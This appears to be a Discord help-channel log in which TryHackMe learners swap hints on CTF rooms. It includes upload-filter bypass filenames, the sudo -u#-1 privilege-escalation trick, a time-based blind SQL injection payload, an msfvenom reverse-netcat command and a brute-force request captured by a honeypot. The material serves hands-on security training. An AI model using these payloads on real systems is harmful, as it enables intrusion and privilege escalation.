#room-hints
is this powershell?
yup
tried, it isn't working either
same output?
did you change rockyou1.txt as well?
Thanks, I am all set. I downloaded the sensitive file by typing the path in the browser. I assume you can't ssh to the machine?
Gave +1 Rep to @left thunder
Not sure, but I think you can not.
Why zip?
I just finished room/uploadvulns, and I have a question about methodology (Task 10 item 3). We are asked: What's the naming scheme of the website? In the Task 11 ctf (jewel), the target tells us it wants a jpg. But the naming scheme is given to us in the gobuster wordlist. How would we find the file naming scheme in a real-world hack?
if it wants a photo, then it should accept jpg files so, you can rename them to shell.jpg.php or if it doesn't work shell.jpg.phP or phP5, if it checks for magic bytes. Then add jpg magic bytes into the request using burp
Thanks, but the problem is that the target renames the upload file using some naming scheme ending in jpg. How do we enumerate it without a wordlist?
I don't have knowledge about that, sorry I couldn't help you. I'm still learning
Me too! I appreciate the effort.
To address my own question: Maybe we can't solve the ctf without knowing that the upload file name is upper-case alphabetic three chars in length. I can accept that and move on.
In the OWASP top 10 room, I can't get the script to work - https://gist.github.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3
It's all json and js, no python.
Oh, I've been there too
sec, I'll drop it
@pseudo tapir
Don't forget to change the IP
Currently doing the Inclusion CTF room. The gobuster brute-force attack seems to be taking ages. I was wondering if there was a way to increase the speed or if it's just like this.
I did read somewhere about increasing the number of threads, but apparently that can decrease the accuracy.
This is the command I used btw :)
Use threads, iirc the command is -t 50 for 50 threads
You're the best, thanks!
Gave +1 Rep to @silent narwhal
anyone able to assist with wget connection refused?
-Wrong hostname / port.
-You don't have a server setup on your side, or at least on the right port.
-Outbound connections not allowed on the target.
...
I'm typing in what the question is asking me but every time it comes back with connection refused...
I gotta go now, but I'll revisit at some point soon
and hopefully either work it out or be back here
but thanks
Hello, some hints for the pickle rick room, don't give me the answer, just give me some hints if possible, thnx in advance
which task?
What room and/or task?
for the first part
Do you have a foothold on the system?
can you tell us what attempt you have tried?
I tried gobuster first, found a login page and then tried to brute-force the login page (sniper attack, Burp Suite) with the username that I found in the code, but with no success
have you checked all directories you found with gobuster?
enumeration is the key
Bruteforce is not usually the way to go. Consider that for future machines.
thnx very much, I will give it another try
I found one other directory but it needs authentication
check all directories you found with gobuster
ok I will give it another try and I will reach you again, thank you very much
glhf
Standing in front of each door is a robot guard. With no other way out of the room, you must choose a door to enter.
forgot to mention, directories and files. Do a rescan and add an extension scan to your gobuster command
@misty orchid Cool gif?
If I connect to another system using an ssh key, will it still ask for a password before finishing the connection? I think I did this right, just wanna make sure.
ssh-keygen
place public key within /.ssh/authorized_keys
ssh -i keyfile user@host
I finished the connection, but I already knew the password, I was just testing if I understood the process
nvm, google is fren
yea
Figured it out then?
not yet but i am close
In Upload Vulnerabilities room Task 11: Whenever I comment out or delete the Client Side Checks and forward the request in Burp, I no longer have the ability to upload any files, the button doesn't work at all, not sure why ..
Someone will get to ya man. I haven't gotten there yet. Going back over the first few rooms atm
yea I figured it out, I logged in
ahahahah exactly
https://tryhackme.com/room/encryptioncrypto101
Trying to modify the config file so that I can use key authentication rather than password for linux2. Can't save the file.
Managed to get everything else done, but it still requires a password, and I cannot disable the option
@stuck fractal I think I am doing it right, I don't think I have permissions on this box to do what the crypto room is saying.
ooh maybe I can change permissions, I am root xD
I'm not root...
Trying to modify the config file so that I can use key authentication rather than password for linux2. It's enabled by default....
You don't need to change any config files
grrrr, why the hell is it still telling me to use a password. I have the authorized_keys in .ssh with 700 permissions on directory, 600 on its contents
THROWS HANDS IN AIR
lol
if I did what I think I did.. ima cry
I have at least 40 derps a day
Make sure you specify the key when you're SSHing in, if it's not in ~/.ssh/id_algorithmGoesHere
I got that part, and it isn't the derp I thought it was
correct key within authorized_keys
Proper permissions?
end of key = so nightshade is the login name correct?
use my private key, and it wants a password
try with full path, but shouldn't need it since I'm already in .ssh
Am I missing something? If so I'll come back to it later, or is something not working right?
Did you create a user called nightshade on the target machine? Have you set a password when you generated the key files?
I set a passphrase, but it doesn't work
I did not create that user on the other system.... If that's the problem..... ffs. Attention to detail I lack..
Into which users folder did you put it then? linux2 user?
yes linux2, I tried linux2@ip and same thing tho
Mh
don't have permission to change the user
create**
oh ffs
I think I might no
again
I fixed it
Wait, linux 2 user has already an ssh login set up, right? Did you remove that key ?
Oh okay, what was it?
Ah okay
Not a problem
prob why ninja went quiet. thinking "FAhking idiot"
Thank you kindly, bot please rep @stuck fractal and @left thunder
Gave +1 Rep to @stuck fractal
I found a way to get root privileges with this command sudo -u#-1 /bin/bash :):)
I mean there could be situations where that would work tho. Current user is a sudoer, but doesn't have access to a directory you need, and root does. I think? Dx
then it's not being "priv esc"
Why not, you are gaining privileges to access a directory you were previously unable to access
I mean I get the funnies, but still.
You have access for it.
you didn't previously tho
just add sudo before the command
can permissions not be set in a way that only one user can view them tho? Sometimes even sudo won't get you there. Or am I wrong
nvm, a root user can change to any other user without the password. So, even though you can technically set permissions so that root cannot view them, nothing stops root from moving to the other account. >.<
I just wanted to give an unlikely, but possible situation, but I just ended up looking like a dummy Dx
then basically using sudo gives you more privileges while you are in the user account, and the owner?
I don't follow. I mean kinda, not really. lol.
set a file so only the user can read. so like 600.
That doesn't make sense
Only the user can read and write. So would root need to move to that account to see it?
no?
what to do with that about priv esc
ye, I get what you are saying.
priv deescalation is what I meant >.<
not really. Just dumb
@stuck fractal Scam link
is there a place to discuss completed rooms with spoilers? (for rooms older than the recent releases)
In the Owasp top 10 room, for task 29, 'Components with Known vulnerabilities - Lab', the instructions are: 'The following is a vulnerable application' What application are they referring to?
It's the target machine you deploy
Has vulnerability, it wants you to find and exploit it
It's a bookstore
You need to search for the exploit for the version and name
For example : "A CMS" is name of a bookstore and its version is 1.4, then you need to search for "A CMS 1.4 exploit"
If you find a version 1.4 or 1.4+, you can exploit it
Any hints for pickle rick second ingredient?
What have you tried so far?
I found the second ingredient ASCII text but I cannot open it because it is not a file
You should be able to open it. Bear in mind spaces when opening a file with a space in the name.
ok thnx, I will give it a try again
I found it, it was so easy lol, I am a noob. Any hints now for the third ingredient?
What did you try so far?
Honestly nothing, I tried with Burp Suite to intercept the request for any useful information but I did not find anything interesting
You have a web shell that allows you to execute commands. You were able to find the second ingredient by doing enumeration on the target.
If after checking the filesystem with your current access you are unable to find it, maybe you should consider trying to move to another account.
You can move to accounts with your same privilege, or with higher privileges (privilege escalation).
I took root access with this command "sudo -u#-1 /bin/bash" and I have access to ssh keys, am I close?
What you did was spawning a new bash session, but bear in mind you won't be able to interact with it since you are still on a web shell.
On the other hand, that trick "sudo -u#-1 /bin/bash" is used to exploit vulnerable versions of sudo, but it's not needed for this machine.
There's one command you should always run when getting access to a machine in order to list your sudo permissions. Then based on that, you might be able to execute certain or any commands.
ok thnx, I will give it a try and I will reach you again if I have any clarifications
Sure no problem.
Was looking at the walkthroughs for https://tryhackme.com/room/ustoun
They all refer to the mysql service, however the port is closed when I port scan the machine
I read the forum in the past, and apparently other users were facing the same problem. I haven't been able to solve that machine because the port wouldn't just open, even after waiting 15 minutes.
Some users reported the port would open after 15 minutes. Maybe try waiting a bit to see if it opens up . . .
@gleaming viper thank you very much. Will try to wait a bit.
And check again
Gave +1 Rep to @gleaming viper
Wireshark 101, Task 7, ARP Traffic
Last question, I'm required to find the IP address at a specific MAC. I used eth.src == mac_address and arp, and from that I get 5 different IP addresses. I can guess which one is correct by the template of the hidden answer but I don't understand how there are multiple IP addresses that I get?
I tried it and i got the correct one, but it still doesn't solve my problem
Hi guys, I'm onto Agent Sudo and I don't know what task 3 is talking about
any help here?
Anybody?
which part? there are multiple questions
They want me to change User-Agent
you mean task 2?
Task 2, question 3
to get the correct user agent, the hint provided is good enough iirc
I am doing bolt and metasploit is saying target is not a bolt application
I know I chose the right exploit
ends with this in metasploit bt_******
still don't understand why we should use bash -p for privilege escalation, anyone help please??
When we use only "bash" command
It runs with the privileges of the current user
It's like just changing shells for work
By using -p, it runs with the privs of the owner (when it has suid permissions)
Mostly root
I learnt about that yesterday while making a write-up for the skynet room haha
thx!
Hi. I was working on the Overpass 3 room, and was not able to upload a reverse shell. Every time I try to upload one, it says "553 Could not create file."
I was uploading the reverse shell from FTP
You sure the revshell is located at your specified path? Also maybe try to change into the folder where the revshell is located, as I'm not sure if you can just specify paths to files within ftp rather than just being in the same directory already, and then connect via ftp, so that you only have to use put revshell.php instead of with the path itself.
I kept it in the same folder, and it worked. Don't know why tho. In FTP you can specify full paths like that, and that file was present in that path too. Not sure why it didn't work earlier. Thanks for your help. A lesson learnt lol. Will add it to my notes for sure, lol.
Gave +1 Rep to @left thunder
guys, I'm doing the tomghost room
Little stuck on privesc part
Can somebody help me
Any hints
Can you share what part you're stuck on?
Hi
Hlo
I need help with hacker of the hill medium port 80
I feel we have to do something with those 2 files on sky
anyone available for a hint/sanity check for the CCT2019 room? Still attempting task1 but I feel stuck
hey guys
has anyone done the lockdown lab?
I am confused, since I only see ssh and http installed
should I brute force the password, or do url scraping
Take what I say with a grain of salt cuz I'm still semi new to all this but it sounds like you should be using your browser for this one. At least in the beginning
this should help: #893575174916542465
have you finished it?
can someone give me a hint about Lockdown room?
got a reverse shell as www-data
can't figure out how to escalate privs to user.
I have gone through the www/html, found nothing interesting
or maybe it's sitting right there, but I can't see it lol
found a password hash, but I don't think it's of any use
tried cracking it, it's still running BTW
cracking the hash?
When you spend more time than usual trying to crack a hash, the reason might be you are using the wrong hash format in your cracking efforts. That's why you should run hashid -mj yourhash before, just in case.
yea I know, it's just that I was trying to crack the wrong hash,
now I am on the right path
Name-that-hash is a better tool @peak harness
I didn't know that one. Thank you for sharing.
Gave +1 Rep to @ashen scaffold
can I get a nudge for year of the jellyfish
I need help with Lockdown, I have user but I need help with root
Specifically which task of linux fundamentals are you trying to complete?
If it is the initial SSH into the machine, when you type in a password, you won't actually 'see' the characters (or *******) as you're typing
Hi, I'm doing the room: You're in a cave insane, and I'm stuck at the moment of modifying /etc/hosts to be able to access /var/www
What should I do?
Yes thank you! A Mod in another room helped me. TY for responding! And helping
You are welcome - have a nice day and have fun
TY CapOneCode!
I think that gets everyone who is hard-headed! After trying every key and wasting time I decided to ask for help
Hard-headed could also be called persistence or grit
That I am! Thx again
Hello all! I am new to TryHackMe and I'm having a slight issue I'm hoping someone can help me with. I'm in the Linux Fundamentals room part 1. When I open the terminal it is opening as root, but in the video it shows it opening as user 'tryhackme'. How do I get the terminal to open as the user and not root?
First, terminate all of the machines you deployed. Then Click here: https://media.discordapp.net/attachments/522158539129618453/893459338767777812/unknown.png
It's likely not an issue you need to worry about
can I get a nudge for year of the jellyfish
Yeah, which part are you in?
Hey guys, I'm trying to finish Task 7 of the Network Services room and connect back from the victim telnet machine to my attacking box. What am I doing wrong?
https://ibb.co/XWwPPcz
Try restarting the target machine
The telnet connection isn't working properly. When you connect, it should say ||SKIDYS BACKDOOR||
Can I get a hint for the "File Inclusion" part of the "introduction to web hacking"? I'm stuck at challenge #2 "capture the flag2 at /etc/flag2". || I changed the cookie properly to get the page as admin rather than guest ||. I therefore get the message || Welcome admin, this is an admin page! Get the flag! || I tried to apply from Burp Suite some GET or POST trying to get the flag2 but nothing happens, what can I do?
I'm not sure what room/task you're doing, but from what you're saying it sounds like you need to send a GET request to that directory. Also, make sure it actually says /etc/flag because /etc likely can't be requested because it's above the root of the website, unless an etc dir was made specifically for that task
Hint is cookie bro
Thank you @waxen mica ! It worked after target machine restart!
Gave +1 Rep to @waxen mica
Hey guys. Really need help with the Task 8 "Capture Flag3 at /etc/flag3" question here. It looks like there is '/' filtering that I can't bypass. I literally tried all LFI cheat sheets already, but no success. https://tryhackme.com/room/fileinc
@slate siren Why not use an earlier LFI challenge and download the code for challenge 3 and look at what it is doing?
thank you for this hint lol, I can't believe I did not try this. I was searching way too far hehe
Gave +1 Rep to @grand idol
could use some assistance please. I've been hard at it but cannot figure out what I'm doing wrong here. I am working on: Network Services 2 - Section 3 - Enumerating NFS.
https://tryhackme.com/room/networkservices2#
Active Machine IP: 10.10.115.132
Attack Machine IP: 10.10.194.19
I am on this part:
"Time to mount the share to our local machine!
First, use "mkdir /tmp/mount" to create a directory on your machine to mount the share to. This is in the /tmp directory- so be aware that it will be removed on restart.
Then, use the mount command we broke down earlier to mount the NFS share to your local machine."
root@kali:/tmp/mount# sudo mount -t nfs 10.10.194.19:share /tmp/mount/ -nolock
mount.nfs: requested NFS version or transport protocol is not supported
The sharename "share" is just an example, that's not the real sharename for that machine.
Need push with "SQL Injection" room
https://tryhackme.com/room/sqlinjectionlm
Task 8 Blind SQLi - Time Based, got the database name and stuck on the tables query...
SQL Query
select * from analytics_referrers where domain='admin123' union select sleep(1),2 FROM information_schema.tables WHERE table_schema = '##########' and table_name like '%';--' LIMIT 1
After typing dozens of verbs at it, later some emotive ones too, I found that 'format' is the obscure answer to this one. 'Formatting' is probably more correct, but there you go.
I'm stuck too
It is practically the same system as in the task before. Just with "admin123' UNION SELECT SLEEP(5),2 " at the beginning
https://tryhackme.com/room/burpsuiterepeater Any idea about task 7
I have literally used intruder from 1 to 1000 with ascii decode, url encode and html encode
How can I find the flag ? I have even tried sql injection and xss payloads
are you making sure that you only send the data to the right field/part of the post request????
POST ?
It is using get request
http://<machine ip>/products/{payload}
http://10.10.179.9/products/1 like this
???
the field where I have to inject is {payload}
it says use extreme inputs instead of integer here in this field
Same challenge here, do you have more insight?
guys which is the last flag on Network Services 2 task 4 last question
i tried everything
and still not getting root
./bash: line 7: syntax error near unexpected token `newline' ./bash: line 7: `<!DOCTYPE html>'
only thing i get
@trim haven can you help me
?
The bash file isn't working
Try using the one on the box
Copy it to the place you need it and then execute the commands on it
where is it located?
/bin/bash ?
I still can't figure this out
this room is all about Repeater.
what does it have to do with intruder? I mean you don't need intruder to do this task.
pay more attention to this message:
See if you can get the server to error out with a "500 Internal Server Error" code by changing the number at the end of the request to extreme inputs.
try negative numbers (you should always consider unusual numbers (such as big or negative ones) when facing these situations).
thanks
what about imaginary numbers????
on it has already said integers
ah fairs
this is it
This is priceless. Whomever built the Uranium CTF room, you are my hero today:
Broadcast message from root@uranium (somewhere) (Tue Oct 5 23:07:49 2021):
That is not nano, sending the cops, bye!
Then it nuked the machine.
I can't stop laughing.
Anyone doing new Cross-Site Scripting room?
Just finished it, whats up?
can I dm you?
Sure thing
thanks now it 's completed
Gave +1 Rep to @prime willow
Hey guys! I am using Kali Linux and when I try to open the website the machine is connected to (for vulnversity) it just gives me a "Can't connect" error, yes I am connected to the OpenVPN
"Secure Connection failed"
Fixed it!
Hi guys! I'm doing the OWASP juice shop. In the section about XSS I have to modify a header value in burp suite, but my burp suite version doesn't have the option to change the header. Do I need to change some option in burp?
It won't be an option. Headers are part of the request. If you intercept the request with burp you can change the headers
Ok, I'll try the intercept again then. Thank you!
Gave +1 Rep to @waxen mica
Hey guys, I'm doing IntroductionToHoneypots. I'm currently stuck on :
What application is being targeted in the first sample? (Tunnelling/Sample1.txt)
Any suggestions on how to read the file or where to learn to read the file?
2021-03-17T10:09:51.052837Z [SSHChannel cowrie-discarded-direct-tcpip (62) on SSHService b'ssh-connection' on HoneyPotSSHTransport,118939,0.0.0.0] discarded direct-tcp forward request 62 to <A DOMAIN>:80 with data b'POST /xmlrpc.php HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: keep-alive\r\nContent-Length: 201\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: <A DOMAIN>\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.109 Safari/537.36\r\n\r\n<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>password11\r</value></param></params></methodCall>'
so this is the log from Sample1.txt
you can see it contains an HTTP request inside. Extract this request, which looks like below:
POST /xmlrpc.php HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: keep-alive\r\nContent-Length: 201\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: <A DOMAIN>\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.109 Safari/537.36\r\n\r\n<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>password11\r</value></param></params></methodCall>
in order to make it more human readable you can interpret those new lines using echo -e
POST /xmlrpc.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Content-Length: 201
Content-Type: application/x-www-form-urlencoded
Host: <A DOMAIN>
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.109 Safari/537.36
</value></param></params></methodCall>hodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>password11
so what does it look like?
Thank you for showing me the simplification. Also how did you post a block of text on discord as an image like that?
EDIT: NVM got it
Gave +1 Rep to @modest timber
it's not an image it's called code blocks.
Any Help? Room Linux Agency root@ec96850005d6:/root# cat success.txt
47 you made it!!!
You have made it, Robert has been taught a lesson not to mess with ICA.
Now, Return to our Agency back with some safe route.
All the previous door's have been closed.
Good Luck Amigo!
NVM Got it.
Hi, i need help for the new SQL injection room, at the task 8 (blind sqli Time-Based).
I almost found the entire table but I can't find any extra characters, and if I do a simple "=" on the name of the table I think I found, it doesn't work.
Can someone help me ?
Refer it to #room-help and, as somebody helped me, you can get help from the source too
B0X Linux Agency Done, finally
table name has 2 words, divided with "_" (underscore)
I found a flaw: at first try I guessed database name as "sqli__" (sqli + 5x underscore sign),
https://website.thm/analytics?referrer=admin123' UNION SELECT sleep(2),2 where database() like 'sqli____';-- *(sqli + 5x underscore sign), Discord hides 5x "_"
Yes I have found it when looking at the query, but now I can't enumerate the users with any value set, whatever the columns chosen
same here, I got columns and got stuck... for a while
I am stuck on Introduction To Honeypots, Task 7 Q1.
"What brand of device is the bot in the first sample searching for? (BotCommands/Sample1.txt)".
Can someone please give me a hint?
I'm stuck on the Agent Sudo CTF. I've enumerated as much as I can think of at the moment (which is hardly anything lol.) The ports for SSH, FTP and HTTP are open. I can't access the FTP server yet due to a lack of credentials but the web server yielded very useful information:
|| Dear agents, Use your own codename as user-agent to access the site. From, Agent R||
Gobuster didn't find anything so the only thing I can think of is a hidden directory. But I don't understand how to get to it with this information. I've tried things like adding "/user-agentr" and "/user-agent" to the end of the URL but to no avail. I can't think of anywhere else to try this.
I also don't want to look at a write-up this time as it's not something that is beyond my ability as far as I'm aware :P
Look into what flags you can use with the curl command
hmm okok
If you're reading this, then know you too have been marked by the overlords...
In the question "Provide the amount of DNS connections made in total for this packet capture." of Masterminds room , I have tried several figures based on results but none of them work for me... I am left with this question -.-
DM me if you're still stuck
I'm a noob and very confused by the Burp Suite OWASP Juice Shop room. I am up to Task 8 and have added the target IP to the scope in Burp and disabled interceptor. I just get a blank page that asked me to accept a cookie, I did so and now it's just blank. Task 8 starts by telling me to attempt to log in, showing me an image of an "account" button that doesn't seem to exist. Any hints are appreciated, even just telling me what I am seeing is expected would help lol
#masterminds hey guys, has anyone finished the Masterminds room?
if you have, pls give me some hints on where I should start?
Maybe this will help
https://www.youtube.com/watch?v=InT-7WZ5Y2Y
See how Brim's intuitive UI leverages the power of Zeek logs to provide insight about network traffic and quickly dive to the packet level in Wireshark when needed. To learn about features added since Brim's initial launch, see the Zeek From Home video at https://www.youtube.com/watch?v=ldrEadAQYTM.
I'm stuck after finding and decoding the JSON cookie
Ok, I think kali likely already has the .xxa filename I'm looking for on it but I'm trying to go about this as if I didn't already think it did.
Can someone point me to a place where can I find some good wordlists looking for 5 and 8 character .xxa filenames without all numbers
I just realized I need a 4 char filename not a 5 since the "." in .xxa counts as a character...
The room CC:Pentesting doesn't give any hint as to which wordlist I need to use to use gobuster to find an .xxa filename. It looks like by the eight grey * in the answer box that its either a four (including .xxa) or an 8 character so I'm trying to make one I think will work. I just tried all the 5 letter filenames in the gobuster file extensions. I guess I'll go back and try the four character ones
Are you sure that's Masterminds? I don't see any questions about decoding a cookie
okay I tried every four letter word in the dirbuster wordlists folder, I'm close to giving up. I even found the .htaccess.xxa type files but none of those are the right answer
Which room
cc:pentesting
The .xxa isn't in the answer
good enough hint. thank you
Hello everyone, anyone doing the new Jason room?
Ok thank you so much
Gave +1 Rep to @prime willow
maybe I went too far :/
I am trying but no luck
Hi everyone! Running a Linux Agency task, went to the user robert, got the password id_rsa, but I can't connect through id_rsa, the error is like this
└─$ ssh robert@10.10.60.185 -i id_rsa
Enter passphrase for key 'id_rsa':
Connection closed by 10.10.60.185 port 22
Who can tell me which way to go and what I did wrong?
I think it's closed by the server, maybe it's the same as the ftp when you try to \\ip\user, you have to specify the user with the flag for it to let you access it
Are you sure you're supposed to be sshing?
I tried, but I'm stuck at the payload step. If I send 'process.exit()' everything goes as expected, but if I try something with a connection (send a request to post.bin or connect to my netcat server) nothing works
And I just checked that the payload works with the sleep function, which means something is wrong with the socket/http functions, any hints?
My hint is to check the same process that was explained in the previous task to find the weak password.
Hi
Hi guys, in the linux part 2 section I have an assignment to switch users
it says that my password is not assigned when I switch to user2
Yes, i can't complete the last task
hello I am doing burp suite : Intruder room and I can't get past task 11, I set numbers 1-100 but I don't get any 200 results
just one
I'm doing the room agent sudo.
I've used stegoveritas on the 2 pictures that have hidden messages.
From one of the pictures I got a .txt file with a message in it saying:
However, the other file didn't give me anything of interest, as far as I understand. But I realise I might be missing something here.
THM is asking for the "steg password". And I'm not sure how to continue this room. Any hints?
try to find out who WXJlYTUx is
Hi, doing CC: Pen Testing room Section 4 - John The Ripper. Been trying to crack the hash (md5) but can't seem to do so and keep getting 'Using default input encoding: UTF-8 No password hashes loaded'
Hi everyone, I'm in the Metasploit room, can someone help me? I'm trying to exploit but the message is "ip:8000 - exploit failed unreachable"
A lot of the time you have to set the format manually when using john
just one hint, just be sure that you use VPN ip, victim machine can't connect to internet
I'm also stuck in the sql injection room, I've got the table names but I have tried a ton of different stuff and can't really find the answer
I'm taking a break from it now but any syntax advice would be appreciated
forgot to mention I'm stuck on task 8, the time based task
Is there anyone who got the same problem and solved this
Care to elaborate?
I mean in this room
in the Alfred room -- for the initial foothold on the box, are we supposed to be brute forcing?
it mentions a nishang script, but I have been looking those over and I'm not really sure how I would gain initial access with it
don't brute-force alfred, btw
Loool
hello discord friends, I am kind of stuck on a question, well, the command. I am watching a YouTube video as well. Something isn't quite right. This section I am on is Network Services 'Exploiting Telnet', the command .... msfvenom -p cmd/unix/reverse_netcat lhost=(IP address) lport= (I have watched two different videos, one with the port 4444 or 4545) .............. I am not getting the right reply back compared to the YouTube videos
What words does the generated payload start with?
The port in the command needs to be the same in the listener.
Ok, thank you
Gave +1 Rep to @mossy hazel
uuum should this not be in #895404687354900540
Gave +1 Rep to @alpine kestrel
no problem
Hi all, I'm working on the Daily Bugle, I can't get the user. Who can give me a tip on how to get the user?
I've gone waaaay down the rabbit hole with nmap in the Net Sec Challenge, who can point me back in the correct direction? I understand it's meant to be stealthy lol
hi, I need a hint with one task in Windows Fundamentals part 2, task 3
At what time every day is the GoogleUpdateTaskMachineUA task configured to run?
I can't find the task in the task scheduler
what I found is a task called "GoogleUpdateTaskMachineCore" with run time at 6:15:30 am, but my answer is in this pattern "?:?? ??"
hello, any hints on the net sec challenge, task 2, IDS evasion?
packet count goes up no matter if I am scanning or not
Which question? I don't see one related to IDS
oh, I've got it, thanks!
Hope to get a nudge here
I am working on "File Inclusion Module" and I am at the last part.
Lab#challenge-1
It says I need to change my request to POST and use the file as a parameter. So I open up Burp and I catch the request.
I send it to Repeater and change the GET to POST and add file=../etc/flag1
So the URL looks like http://10.10.201.207/challenges/chall1.php?file=../etc/flag1
I took it to curl to see if I can do it like some thing like
I assume I am on the right track, but as I keep failing maybe I am missing something or overlooking something. Any ideas would be great, thanks jedis.
the "/" needs to be encoded in Repeater
or change the method using developer tool
You da man
After playing around with Chrome as an option to re-submit the request
Changed stuff there got me to see the flag, thanks again
I did it through the developer tool
I'm working through the SMB tasks in the Network Services room of the Complete Beginner pathway. I downloaded an id_rsa private key file and changed the permissions with chmod 600 id_rsa, and the next task is to "use the service and key to log-in to the server". I'm lost as to how to do that. I've added the keys to my ssh folder but don't know how to use the keys for authentication into the target machine. Any hints?
u can use ssh key for it
do u know the user name?
hello
can someone explain what the protocol security negotiation error means
in xfreerdp
Google is your friend here. Ya gotta get used to using Google as a first resource in this field
It could be many things. I never had great luck with FreeRDP. I would suggest Remmina (https://remmina.org/).
turns out Remmina, as it's based on FreeRDP, shows the same exact error
I couldn't understand the term protocol security negotiation
maybe it's related to certificates or something
Hmmm.. A quick Google search shows tons of hits. You could go down the list and see if anything matches your problem.
Or fire up a fresh VM, install the RDP client of your choice and see if a fresh install changes anything.
hello, I'm working on the Wreath room. I downloaded the first key (id_rsa) from the first machine (web server) but when I try to ssh I get this permission error
which error?
ssh -i rsa root@<ip> 255 ⨯
Load key "rsa": invalid format
root@<ip>: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
hmm not sure but invalid format could mean something went wrong while copying the key
I tried copy-paste and meterpreter download, both give me the same error.
As in the Wreath network?
I'm doing Wreath and there's a relay server between the target server. target is running wsman on the standard port
evil-winrm works fine
Is the file named rsa or is it named with some added characters?
Could someone hint on the HackPark challenge?
yeah, I know the username
If someone has completed the Redline room that was just added today, can someone share how they set up the "Memory, Disk, System, Network, and Other" in the "View and Edit Your Script for Windows" for IOC Search Collector for Task 6? Given the hint for one of the questions in Task 6, it says to look at "PE Info," but that is not even available to be viewed.
ok so the command would be ssh -i file username@ip
that's what I was forgetting, the -i switch. thanks!
Gave +1 Rep to @modest flicker
Hello, quick (first ever) question about the room "Network Services 2", Exploiting NFS. When running the BASH file, I get the following error: cappucino@polonfs:~$ ./bash -p
./bash: line 1: syntax error near unexpected token <' ./bash: line 1: <html><body>You are being <a href="https://github.com/polo-sec/writing/blob/master/Security Challenge Walkthroughs/Networks 2/bash">redirected</a>.</body></html>'
is this an error consistent with a permissions issue, or is the script in the BASH file I'm supposed to use creating the error on its own?
Thank you in advance for your insight.
ur welcome
can u tell me the prob
I'm not sure what you're trying to do here, but from what it looks like, you tried to put html in a bash script?
That won't run for obvious reasons
no sir, I simply ran the bash with ./bash -p as instructed.
@waxen mica
when I ran the bash through my VM natively, I got a similar 'redirect error'.
https://tryhackme.com/room/networkservices2 Task 4, exploiting NFS.
but it sounds like at least it's not an issue with the permissions.
so that's a plus.
Thank you for your reply.
that's the bash shell it's asking me to run.
Did you use wget to download that bash file?
I did not. I used curl -o
(slaps head)
that's a good idea, and I will try it later.
Well, to me it looks like the bash file you downloaded is not right. To download stuff from GitHub with wget (maybe same for curl) you have to use the raw link, otherwise you will have HTML elements in your file, which will then give you errors if you run it. So the raw link for that file would be: https://github.com/polo-sec/writing/blob/master/Security Challenge Walkthroughs/Networks 2/bash?raw=true
Thank you for that. I've re-downloaded the BASH and renamed it to BASH from BASH?raw=true
I'll re-run the course and report back if that solved the issue.
Thank you.
Hi fam, any hints on Netsec challenge on ftp nonstandard port
Hey, if you've scanned the target, you should have the answer somewhere in the output
yes, thanks for the response buddy, got it already
Gave +1 Rep to @prime willow
congratz on getting it
so there's this task "A very useful output format: how would you save results in a "grepable" format?"
I did nmap -H
there's no info about this
the answer was -oG
but I found this by googling
why isn't it in the nmap manual or help
it is in the man nmap page
nmap -H is just a short introduction and not the full nmap manual that you get from the command man
if it is not maybe you have an old version..... or you were just unlucky and missed it
It is in the manual page. But you also don't always need to read the manual. Finding the answer on Google is a good thing
You will always need to be able to find answers on google
Even as a professional
would anyone know why this pass is not working
Why are you SSHing into that machine?
what should I do instead?
that's what I have done in my Linux Fundamentals
no need on that task probably
Yep. And this is different. Read through the content in the room.
It's best not to assume what you're meant to do
need help https://i.imgur.com/psu6zpK.png
did so much research on Google about this
" Known by many names, SYN-scanning, or Half Open scanning is where the full TCP connection is never made. SYN-scanning sends the first packet only, the one marked with the SYN flag. It waits for either a RST, ACK or SYN,ACK response. "
none of these options work
the answer format is too long for any of these to work
think both are named in the text of that section of that room
the answer format is so weird
one is a very old name
have you checked the man page?
also read the task
it can help if you say which room it is
furthernmap
SYN scans can also be made to work by giving Nmap the CAP_NET_RAW, CAP_NET_ADMIN and CAP_NET_BIND_SERVICE capabilities; however, this may not allow many of the NSE scripts to run properly.
One of the answers is stealth scan iirc
" syn scans can also be made to work "
you are correct
is this a reference to another name for SYN scan?
the question is really hard
it's just a puzzle at this point
read the text in the task, it's an easy question
It's really not
Except no spaces
works with a space
the other one is half open scan ?
that's the first, yes
half-open... no space
honestly, read through the text that is there, you'll have it in no time
good job getting it now
took only like 50 minutes
a lot of questions on THM are there to make sure you have read and understood the info above. If you're struggling, go back and at least skim-read it
Some aren't immediately intuitive like privesc rooms
Hey all, looking for some assistance. I am in the "Content Discovery" room on task 3. I have identified the favicon, got the hash, and cross-referenced it to the OWASP database. There is only 1 match that is "Zero byte favicon". However that answer is too long. I have tried all 3 words individually, with no luck. I ran the process again, came up with the same result, and am stuck as I cannot determine the stack framework. Any thoughts?
so I'm doing the Metasploit room rn but whenever I try to send it over it always ends up taking a long time or saying no session was created
